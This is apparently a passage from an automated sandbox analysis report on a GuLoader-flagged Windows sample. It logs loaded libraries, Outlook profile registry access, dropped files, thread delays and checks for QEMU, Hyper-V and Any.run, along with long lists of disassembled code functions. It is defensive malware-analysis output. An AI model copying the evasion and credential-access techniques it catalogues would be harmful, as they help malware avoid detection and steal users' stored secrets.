          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: 02Eh1ah35H.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: waitfor.pdbGCTL source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp
          Source: Binary string: waitfor.pdb source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 02Eh1ah35H.exe, 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000000.00000002.28256040548.0000000004AC5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_6FDF1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FDF1B5F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333021AD pushad ; retf 0004h2_2_3330223F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333097A1 push es; iretd 2_2_333097A8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333308CD push ecx; mov dword ptr [esp], ecx2_2_333308D6
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051C08CD push ecx; mov dword ptr [esp], ecx4_2_051C08D6
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_050844B3 push esp; retf 4_2_050844B5
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05084F98 push ss; iretd 4_2_05085088
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05085075 push ss; iretd 4_2_05085088
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_050868A7 pushad ; retf 4_2_050868A8
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_050868C4 pushfd ; ret 4_2_050868E8
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05095242 push eax; ret 4_2_05095244
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05086252 pushfd ; retf 4_2_0508625D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Heteroscian.GenJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chlJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\CauserJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Causer\Umpiress240.bivJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Causer\potmaker.stiJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI/Special instruction interceptor: Address: 507CABA
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI/Special instruction interceptor: Address: 1CDCABA
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI/Special instruction interceptor: Address: 7FF9BAA10594
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI/Special instruction interceptor: Address: 7FF9BAA0FF74
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D6C4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D864
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D144
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA10594
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D764
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D324
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D364
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D004
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0FF74
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D6C4
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D864
          Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF9BAA0D604
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: 02Eh1ah35H.exe, 00000000.00000002.28255474172.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562936452.0000000003120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: 02Eh1ah35H.exe, 00000000.00000002.28254430063.0000000000B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 rdtsc 2_2_33371763
          Source: C:\Windows\SysWOW64\waitfor.exeWindow / User API: threadDelayed 9265Jump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI coverage: 0.4 %
          Source: C:\Windows\SysWOW64\waitfor.exeAPI coverage: 1.4 %
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2088Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564Thread sleep count: 121 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564Thread sleep time: -242000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564Thread sleep count: 9265 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564Thread sleep time: -18530000s >= -30000sJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\waitfor.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: 02Eh1ah35H.exe, 00000002.00000002.28562292473.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458714616.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458343135.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 02Eh1ah35H.exe, 00000000.00000002.28255474172.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562936452.0000000003120000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QC:\Program Files\Qemu-ga\qemu-ga.exe
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28254430063.0000000000B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003365000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000005.00000002.28906416171.0000027F83D77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI call chain: ExitProcess graph end nodegraph_0-4305
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeAPI call chain: ExitProcess graph end nodegraph_0-4458
          Source: C:\Windows\SysWOW64\waitfor.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 rdtsc 2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333734E0 NtCreateMutant,LdrInitializeThunk,2_2_333734E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_6FDF1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FDF1B5F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33368322 mov eax, dword ptr fs:[00000030h]2_2_33368322
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33368322 mov eax, dword ptr fs:[00000030h]2_2_33368322
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33368322 mov eax, dword ptr fs:[00000030h]2_2_33368322
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335332D mov eax, dword ptr fs:[00000030h]2_2_3335332D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332E328 mov eax, dword ptr fs:[00000030h]2_2_3332E328
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332E328 mov eax, dword ptr fs:[00000030h]2_2_3332E328
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332E328 mov eax, dword ptr fs:[00000030h]2_2_3332E328
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334E310 mov eax, dword ptr fs:[00000030h]2_2_3334E310
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334E310 mov eax, dword ptr fs:[00000030h]2_2_3334E310
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334E310 mov eax, dword ptr fs:[00000030h]2_2_3334E310
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336631F mov eax, dword ptr fs:[00000030h]2_2_3336631F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33329303 mov eax, dword ptr fs:[00000030h]2_2_33329303
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33329303 mov eax, dword ptr fs:[00000030h]2_2_33329303
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF30A mov eax, dword ptr fs:[00000030h]2_2_333EF30A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B330C mov eax, dword ptr fs:[00000030h]2_2_333B330C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B330C mov eax, dword ptr fs:[00000030h]2_2_333B330C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B330C mov eax, dword ptr fs:[00000030h]2_2_333B330C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B330C mov eax, dword ptr fs:[00000030h]2_2_333B330C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE372 mov eax, dword ptr fs:[00000030h]2_2_333AE372
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE372 mov eax, dword ptr fs:[00000030h]2_2_333AE372
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE372 mov eax, dword ptr fs:[00000030h]2_2_333AE372
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE372 mov eax, dword ptr fs:[00000030h]2_2_333AE372
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B0371 mov eax, dword ptr fs:[00000030h]2_2_333B0371
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B0371 mov eax, dword ptr fs:[00000030h]2_2_333B0371
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335237A mov eax, dword ptr fs:[00000030h]2_2_3335237A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333B360 mov eax, dword ptr fs:[00000030h]2_2_3333B360
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333B360 mov eax, dword ptr fs:[00000030h]2_2_3333B360
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333B360 mov eax, dword ptr fs:[00000030h]2_2_3333B360
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333B360 mov eax, dword ptr fs:[00000030h]2_2_3333B360
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333B360 mov eax, dword ptr fs:[00000030h]2_2_3333B360
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333B360 mov eax, dword ptr fs:[00000030h]2_2_3333B360
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E363 mov eax, dword ptr fs:[00000030h]2_2_3336E363
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336A350 mov eax, dword ptr fs:[00000030h]2_2_3336A350
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33328347 mov eax, dword ptr fs:[00000030h]2_2_33328347
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33328347 mov eax, dword ptr fs:[00000030h]2_2_33328347
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33328347 mov eax, dword ptr fs:[00000030h]2_2_33328347
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33403336 mov eax, dword ptr fs:[00000030h]2_2_33403336
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AC3B0 mov eax, dword ptr fs:[00000030h]2_2_333AC3B0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333393A6 mov eax, dword ptr fs:[00000030h]2_2_333393A6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333393A6 mov eax, dword ptr fs:[00000030h]2_2_333393A6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335A390 mov eax, dword ptr fs:[00000030h]2_2_3335A390
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335A390 mov eax, dword ptr fs:[00000030h]2_2_3335A390
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335A390 mov eax, dword ptr fs:[00000030h]2_2_3335A390
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331380 mov eax, dword ptr fs:[00000030h]2_2_33331380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331380 mov eax, dword ptr fs:[00000030h]2_2_33331380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331380 mov eax, dword ptr fs:[00000030h]2_2_33331380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331380 mov eax, dword ptr fs:[00000030h]2_2_33331380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331380 mov eax, dword ptr fs:[00000030h]2_2_33331380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F380 mov eax, dword ptr fs:[00000030h]2_2_3334F380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F380 mov eax, dword ptr fs:[00000030h]2_2_3334F380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F380 mov eax, dword ptr fs:[00000030h]2_2_3334F380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F380 mov eax, dword ptr fs:[00000030h]2_2_3334F380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F380 mov eax, dword ptr fs:[00000030h]2_2_3334F380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F380 mov eax, dword ptr fs:[00000030h]2_2_3334F380
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF38A mov eax, dword ptr fs:[00000030h]2_2_333EF38A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333633D0 mov eax, dword ptr fs:[00000030h]2_2_333633D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333643D0 mov ecx, dword ptr fs:[00000030h]2_2_333643D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B43D5 mov eax, dword ptr fs:[00000030h]2_2_333B43D5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332E3C0 mov eax, dword ptr fs:[00000030h]2_2_3332E3C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332E3C0 mov eax, dword ptr fs:[00000030h]2_2_3332E3C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332E3C0 mov eax, dword ptr fs:[00000030h]2_2_3332E3C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332C3C7 mov eax, dword ptr fs:[00000030h]2_2_3332C3C7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333363CB mov eax, dword ptr fs:[00000030h]2_2_333363CB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33350230 mov ecx, dword ptr fs:[00000030h]2_2_33350230
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B0227 mov eax, dword ptr fs:[00000030h]2_2_333B0227
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B0227 mov eax, dword ptr fs:[00000030h]2_2_333B0227
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B0227 mov eax, dword ptr fs:[00000030h]2_2_333B0227
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336A22B mov eax, dword ptr fs:[00000030h]2_2_3336A22B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336A22B mov eax, dword ptr fs:[00000030h]2_2_3336A22B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336A22B mov eax, dword ptr fs:[00000030h]2_2_3336A22B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332821B mov eax, dword ptr fs:[00000030h]2_2_3332821B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333BB214 mov eax, dword ptr fs:[00000030h]2_2_333BB214
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333BB214 mov eax, dword ptr fs:[00000030h]2_2_333BB214
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A200 mov eax, dword ptr fs:[00000030h]2_2_3332A200
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B273 mov eax, dword ptr fs:[00000030h]2_2_3332B273
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B273 mov eax, dword ptr fs:[00000030h]2_2_3332B273
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B273 mov eax, dword ptr fs:[00000030h]2_2_3332B273
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C327E mov eax, dword ptr fs:[00000030h]2_2_333C327E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C327E mov eax, dword ptr fs:[00000030h]2_2_333C327E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C327E mov eax, dword ptr fs:[00000030h]2_2_333C327E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C327E mov eax, dword ptr fs:[00000030h]2_2_333C327E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C327E mov eax, dword ptr fs:[00000030h]2_2_333C327E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C327E mov eax, dword ptr fs:[00000030h]2_2_333C327E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333ED270 mov eax, dword ptr fs:[00000030h]2_2_333ED270
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AD250 mov eax, dword ptr fs:[00000030h]2_2_333AD250
